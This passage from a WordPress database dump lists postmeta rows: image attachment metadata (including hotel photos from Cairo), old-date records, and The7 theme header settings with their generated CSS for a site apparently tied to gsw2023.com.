(34082,4741,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1882;s:6:\"height\";i:600;s:4:\"file\";s:20:\"2023/06/Picture1.png\";s:8:\"filesize\";i:277503;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"Picture1-300x96.png\";s:5:\"width\";i:300;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25515;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"Picture1-1024x326.png\";s:5:\"width\";i:1024;s:6:\"height\";i:326;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:232866;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Picture1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7580;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"Picture1-768x245.png\";s:5:\"width\";i:768;s:6:\"height\";i:245;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:153322;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"Picture1-1536x490.png\";s:5:\"width\";i:1536;s:6:\"height\";i:490;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:569365;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:20:\"Picture1-500x159.png\";s:5:\"width\";i:500;s:6:\"height\";i:159;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66129;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:20:\"Picture1-800x255.png\";s:5:\"width\";i:800;s:6:\"height\";i:255;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:168685;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:21:\"Picture1-1280x408.png\";s:5:\"width\";i:1280;s:6:\"height\";i:408;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:396390;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34083,2082,'_wp_old_date','2023-06-21'),
(34084,2083,'_wp_old_date','2023-06-21'),
(34085,2346,'_wp_old_date','2023-06-21'),
(34086,2348,'_wp_old_date','2023-06-21'),
(34087,2349,'_wp_old_date','2023-06-21'),
(34088,2350,'_wp_old_date','2023-06-21'),
(34089,2351,'_wp_old_date','2023-06-21'),
(34090,2904,'_wp_old_date','2023-06-21'),
(34091,3556,'_wp_old_date','2023-06-21'),
(34092,2084,'_wp_old_date','2023-06-21'),
(34093,2352,'_wp_old_date','2023-06-21'),
(34094,2281,'_wp_old_date','2023-06-21'),
(34095,2353,'_wp_old_date','2023-06-21'),
(34096,2354,'_wp_old_date','2023-06-21'),
(34097,2355,'_wp_old_date','2023-06-21'),
(34098,2282,'_wp_old_date','2023-06-21'),
(34099,2283,'_wp_old_date','2023-06-21'),
(34100,3671,'_wp_old_date','2023-06-21'),
(34101,3645,'_wp_old_date','2023-06-21'),
(34102,2284,'_wp_old_date','2023-06-21'),
(34103,2921,'_wp_old_date','2023-06-21'),
(34104,2285,'_wp_old_date','2023-06-21'),
(34105,2356,'_wp_old_date','2023-06-21'),
(34106,2357,'_wp_old_date','2023-06-21'),
(34107,2359,'_wp_old_date','2023-06-21'),
(34108,2358,'_wp_old_date','2023-06-21'),
(34109,2286,'_wp_old_date','2023-06-21'),
(34111,4745,'_wp_attached_file','2023/06/Picture1-1.png'),
(34112,4745,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1832;s:6:\"height\";i:765;s:4:\"file\";s:22:\"2023/06/Picture1-1.png\";s:8:\"filesize\";i:320351;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"Picture1-1-300x125.png\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31128;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"Picture1-1-1024x428.png\";s:5:\"width\";i:1024;s:6:\"height\";i:428;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:255828;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Picture1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11205;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"Picture1-1-768x321.png\";s:5:\"width\";i:768;s:6:\"height\";i:321;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:186092;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"Picture1-1-1536x641.png\";s:5:\"width\";i:1536;s:6:\"height\";i:641;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:656488;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:22:\"Picture1-1-500x209.png\";s:5:\"width\";i:500;s:6:\"height\";i:209;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84787;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:22:\"Picture1-1-800x334.png\";s:5:\"width\";i:800;s:6:\"height\";i:334;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:204737;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:23:\"Picture1-1-1280x534.png\";s:5:\"width\";i:1280;s:6:\"height\";i:534;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:471529;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34113,2669,'_dt_fancy_header_layout_heading',''),
(34114,2669,'_dt_fancy_header_title_aligment','center'),
(34115,2669,'_dt_fancy_header_height','300'),
(34116,2669,'_dt_fancy_header_padding-top','0px'),
(34117,2669,'_dt_fancy_header_padding-bottom','0px'),
(34118,2669,'_dt_fancy_header_breadcrumbs_heading',''),
(34119,2669,'_dt_fancy_header_breadcrumbs','disabled'),
(34120,2669,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(34121,2669,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(34122,2669,'_dt_fancy_header_title_heading',''),
(34123,2669,'_dt_fancy_header_title_mode','custom'),
(34124,2669,'_dt_fancy_header_title',''),
(34125,2669,'_dt_fancy_header_title_font_size','30'),
(34126,2669,'_dt_fancy_header_title_line_height','36'),
(34127,2669,'_dt_fancy_header_text_transform','none'),
(34128,2669,'_dt_fancy_header_title_color_mode','color'),
(34129,2669,'_dt_fancy_header_title_color','#ffffff'),
(34130,2669,'_dt_fancy_header_subtitle_heading',''),
(34131,2669,'_dt_fancy_header_subtitle',''),
(34132,2669,'_dt_fancy_header_subtitle_font_size','18'),
(34133,2669,'_dt_fancy_header_subtitle_line_height','26'),
(34134,2669,'_dt_fancy_header_subtitle_text_transform','none'),
(34135,2669,'_dt_fancy_header_subtitle_color_mode','color'),
(34136,2669,'_dt_fancy_header_subtitle_color','#ffffff'),
(34137,2669,'_dt_fancy_header_bg_heading',''),
(34138,2669,'_dt_fancy_header_bg_color','#222222'),
(34139,2669,'_dt_fancy_header_bg_image_origin','featured_image'),
(34140,2669,'_dt_fancy_header_bg_image','a:0:{}'),
(34141,2669,'_dt_fancy_header_bg_repeat','no-repeat'),
(34142,2669,'_dt_fancy_header_bg_position_x','center'),
(34143,2669,'_dt_fancy_header_bg_position_y','center'),
(34144,2669,'_dt_fancy_header_bg_fullscreen','1'),
(34145,2669,'_dt_fancy_header_bg_overlay','0'),
(34146,2669,'_dt_fancy_header_overlay_color','#000'),
(34147,2669,'_dt_fancy_header_bg_overlay_opacity','50'),
(34148,2669,'_dt_fancy_header_scroll_effect','default'),
(34149,2669,'_dt_fancy_header_bg_parallax','0.5'),
(34150,2669,'_dt_fancy_header_responsiveness_heading',''),
(34151,2669,'_dt_fancy_header_responsiveness','enabled'),
(34152,2669,'_dt_fancy_header_responsiveness_switch','778px'),
(34153,2669,'_dt_fancy_header_responsive_height','70'),
(34154,2669,'_dt_fancy_header_responsive_font_size','30'),
(34155,2669,'_dt_fancy_header_responsive_title_line_height','38'),
(34156,2669,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(34157,2669,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(34158,2669,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(34159,2669,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/pexels-alphatradezone-5833807-scaled-e1668184706761.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(34160,4771,'_edit_lock','1690987090:1'),
(34169,4771,'_edit_last','1'),
(34170,4771,'_wpb_vc_js_status','false'),
(34171,4771,'_dt_sidebar_position','disabled'),
(34172,4771,'_dt_sidebar_widgetarea_id','sidebar_1'),
(34173,4771,'_dt_sidebar_hide_on_mobile','0'),
(34174,4771,'_dt_footer_show','0'),
(34175,4771,'_dt_footer_widgetarea_id','sidebar_2'),
(34176,4771,'_dt_footer_hide_on_mobile','0'),
(34177,4771,'_dt_header_title','fancy'),
(34178,4771,'_dt_header_background','normal'),
(34179,4771,'_dt_header_background_below_slideshow','disabled'),
(34180,4771,'_dt_header_transparent_bg_color_scheme','light'),
(34181,4771,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(34182,4771,'_dt_header_transparent_top_bar_bg_opacity','25'),
(34183,4771,'_dt_header_transparent_bg_color','#000000'),
(34184,4771,'_dt_header_transparent_bg_opacity','50'),
(34185,4771,'_dt_header_disabled_background','normal'),
(34186,4771,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(34187,4771,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(34188,4771,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(34189,4771,'_dt_header_disabled_transparent_bg_color','#000000'),
(34190,4771,'_dt_header_disabled_transparent_bg_opacity','50'),
(34191,4771,'_dt_page_overrides_top_margin',''),
(34192,4771,'_dt_page_overrides_right_margin',''),
(34193,4771,'_dt_page_overrides_bottom_margin',''),
(34194,4771,'_dt_page_overrides_left_margin',''),
(34195,4771,'_dt_mobile_page_padding_top',''),
(34196,4771,'_dt_mobile_page_padding_right',''),
(34197,4771,'_dt_mobile_page_padding_bottom',''),
(34198,4771,'_dt_mobile_page_padding_left',''),
(34199,4771,'_dt_fancy_header_layout_heading',''),
(34200,4771,'_dt_fancy_header_title_aligment','center'),
(34201,4771,'_dt_fancy_header_height','300'),
(34202,4771,'_dt_fancy_header_padding-top','0px'),
(34203,4771,'_dt_fancy_header_padding-bottom','0px'),
(34204,4771,'_dt_fancy_header_breadcrumbs_heading',''),
(34205,4771,'_dt_fancy_header_breadcrumbs','disabled'),
(34206,4771,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(34207,4771,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(34208,4771,'_dt_fancy_header_title_heading',''),
(34209,4771,'_dt_fancy_header_title_mode','generic'),
(34210,4771,'_dt_fancy_header_title',''),
(34211,4771,'_dt_fancy_header_title_font_size','30'),
(34212,4771,'_dt_fancy_header_title_line_height','36'),
(34213,4771,'_dt_fancy_header_text_transform','none'),
(34214,4771,'_dt_fancy_header_title_color_mode','color'),
(34215,4771,'_dt_fancy_header_title_color','#ffffff'),
(34216,4771,'_dt_fancy_header_subtitle_heading',''),
(34217,4771,'_dt_fancy_header_subtitle',''),
(34218,4771,'_dt_fancy_header_subtitle_font_size','18'),
(34219,4771,'_dt_fancy_header_subtitle_line_height','26'),
(34220,4771,'_dt_fancy_header_subtitle_text_transform','none'),
(34221,4771,'_dt_fancy_header_subtitle_color_mode','color'),
(34222,4771,'_dt_fancy_header_subtitle_color','#ffffff'),
(34223,4771,'_dt_fancy_header_bg_heading',''),
(34224,4771,'_dt_fancy_header_bg_color','#222222'),
(34225,4771,'_dt_fancy_header_bg_image_origin','custom'),
(34226,4771,'_dt_fancy_header_bg_image','a:0:{}'),
(34227,4771,'_dt_fancy_header_bg_repeat','no-repeat'),
(34228,4771,'_dt_fancy_header_bg_position_x','center'),
(34229,4771,'_dt_fancy_header_bg_position_y','center'),
(34230,4771,'_dt_fancy_header_bg_fullscreen','1'),
(34231,4771,'_dt_fancy_header_bg_overlay','0'),
(34232,4771,'_dt_fancy_header_overlay_color','#000'),
(34233,4771,'_dt_fancy_header_bg_overlay_opacity','50'),
(34234,4771,'_dt_fancy_header_scroll_effect','default'),
(34235,4771,'_dt_fancy_header_bg_parallax','0.5'),
(34236,4771,'_dt_fancy_header_responsiveness_heading',''),
(34237,4771,'_dt_fancy_header_responsiveness','disabled'),
(34238,4771,'_dt_fancy_header_responsiveness_switch','778px'),
(34239,4771,'_dt_fancy_header_responsive_height','70'),
(34240,4771,'_dt_fancy_header_responsive_font_size','30'),
(34241,4771,'_dt_fancy_header_responsive_title_line_height','38'),
(34242,4771,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(34243,4771,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(34244,4771,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(34245,4771,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(34246,4778,'_edit_lock','1687568106:1'),
(34255,4778,'_edit_last','1'),
(34256,4778,'_wpb_vc_js_status','false'),
(34257,4778,'_dt_sidebar_position','disabled'),
(34258,4778,'_dt_sidebar_widgetarea_id','sidebar_1'),
(34259,4778,'_dt_sidebar_hide_on_mobile','0'),
(34260,4778,'_dt_footer_show','1'),
(34261,4778,'_dt_footer_widgetarea_id','sidebar_2'),
(34262,4778,'_dt_footer_hide_on_mobile','0'),
(34263,4778,'_dt_header_title','fancy'),
(34264,4778,'_dt_header_background','normal'),
(34265,4778,'_dt_header_background_below_slideshow','disabled'),
(34266,4778,'_dt_header_transparent_bg_color_scheme','light'),
(34267,4778,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(34268,4778,'_dt_header_transparent_top_bar_bg_opacity','25'),
(34269,4778,'_dt_header_transparent_bg_color','#000000'),
(34270,4778,'_dt_header_transparent_bg_opacity','50'),
(34271,4778,'_dt_header_disabled_background','normal'),
(34272,4778,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(34273,4778,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(34274,4778,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(34275,4778,'_dt_header_disabled_transparent_bg_color','#000000'),
(34276,4778,'_dt_header_disabled_transparent_bg_opacity','50'),
(34277,4778,'_dt_page_overrides_top_margin',''),
(34278,4778,'_dt_page_overrides_right_margin',''),
(34279,4778,'_dt_page_overrides_bottom_margin',''),
(34280,4778,'_dt_page_overrides_left_margin',''),
(34281,4778,'_dt_mobile_page_padding_top',''),
(34282,4778,'_dt_mobile_page_padding_right',''),
(34283,4778,'_dt_mobile_page_padding_bottom',''),
(34284,4778,'_dt_mobile_page_padding_left',''),
(34285,4778,'_dt_fancy_header_layout_heading',''),
(34286,4778,'_dt_fancy_header_title_aligment','center'),
(34287,4778,'_dt_fancy_header_height','300'),
(34288,4778,'_dt_fancy_header_padding-top','0px'),
(34289,4778,'_dt_fancy_header_padding-bottom','0px'),
(34290,4778,'_dt_fancy_header_breadcrumbs_heading',''),
(34291,4778,'_dt_fancy_header_breadcrumbs','disabled'),
(34292,4778,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(34293,4778,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(34294,4778,'_dt_fancy_header_title_heading',''),
(34295,4778,'_dt_fancy_header_title_mode','generic'),
(34296,4778,'_dt_fancy_header_title',''),
(34297,4778,'_dt_fancy_header_title_font_size','30'),
(34298,4778,'_dt_fancy_header_title_line_height','36'),
(34299,4778,'_dt_fancy_header_text_transform','none'),
(34300,4778,'_dt_fancy_header_title_color_mode','color'),
(34301,4778,'_dt_fancy_header_title_color','#ffffff'),
(34302,4778,'_dt_fancy_header_subtitle_heading',''),
(34303,4778,'_dt_fancy_header_subtitle',''),
(34304,4778,'_dt_fancy_header_subtitle_font_size','18'),
(34305,4778,'_dt_fancy_header_subtitle_line_height','26'),
(34306,4778,'_dt_fancy_header_subtitle_text_transform','none'),
(34307,4778,'_dt_fancy_header_subtitle_color_mode','color'),
(34308,4778,'_dt_fancy_header_subtitle_color','#ffffff'),
(34309,4778,'_dt_fancy_header_bg_heading',''),
(34310,4778,'_dt_fancy_header_bg_color','#222222'),
(34311,4778,'_dt_fancy_header_bg_image_origin','custom'),
(34312,4778,'_dt_fancy_header_bg_image','a:0:{}'),
(34313,4778,'_dt_fancy_header_bg_repeat','no-repeat'),
(34314,4778,'_dt_fancy_header_bg_position_x','center'),
(34315,4778,'_dt_fancy_header_bg_position_y','center'),
(34316,4778,'_dt_fancy_header_bg_fullscreen','1'),
(34317,4778,'_dt_fancy_header_bg_overlay','0'),
(34318,4778,'_dt_fancy_header_overlay_color','#000'),
(34319,4778,'_dt_fancy_header_bg_overlay_opacity','50'),
(34320,4778,'_dt_fancy_header_scroll_effect','default'),
(34321,4778,'_dt_fancy_header_bg_parallax','0.5'),
(34322,4778,'_dt_fancy_header_responsiveness_heading',''),
(34323,4778,'_dt_fancy_header_responsiveness','disabled'),
(34324,4778,'_dt_fancy_header_responsiveness_switch','778px'),
(34325,4778,'_dt_fancy_header_responsive_height','70'),
(34326,4778,'_dt_fancy_header_responsive_font_size','30'),
(34327,4778,'_dt_fancy_header_responsive_title_line_height','38'),
(34328,4778,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(34329,4778,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(34330,4778,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(34331,4778,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(34332,4783,'_wp_attached_file','2023/06/Grand-Nile-Tower-Hotel.jpg'),
(34333,4783,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:275;s:6:\"height\";i:183;s:4:\"file\";s:34:\"2023/06/Grand-Nile-Tower-Hotel.jpg\";s:8:\"filesize\";i:5854;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"Grand-Nile-Tower-Hotel-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5000;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34334,2685,'_oembed_3eccc223a803595078bed21d296c056f','{{unknown}}'),
(34335,4788,'_wp_attached_file','2023/06/Cairo_-_Garden_City_-_Hyatt_from_the_Nile-scaled.jpg'),
(34336,4788,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1500;s:4:\"file\";s:60:\"2023/06/Cairo_-_Garden_City_-_Hyatt_from_the_Nile-scaled.jpg\";s:8:\"filesize\";i:659435;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:53:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13630;}s:5:\"large\";a:5:{s:4:\"file\";s:54:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile-1024x600.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128751;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:53:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7311;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:53:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile-768x450.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77061;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:54:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile-1536x900.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:266375;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:55:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile-2048x1200.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:442406;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:53:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile-500x293.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35226;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:53:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile-800x469.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:469;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82803;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:54:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile-1280x750.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:750;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192427;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:55:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile-1920x1125.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:395497;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:7:\"C8080WZ\";s:7:\"caption\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:17:\"created_timestamp\";s:10:\"1216551780\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"7.5\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:45:\"Cairo_-_Garden_City_-_Hyatt_from_the_Nile.jpg\";}'),
(34337,4791,'_wp_attached_file','2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc.jpg'),
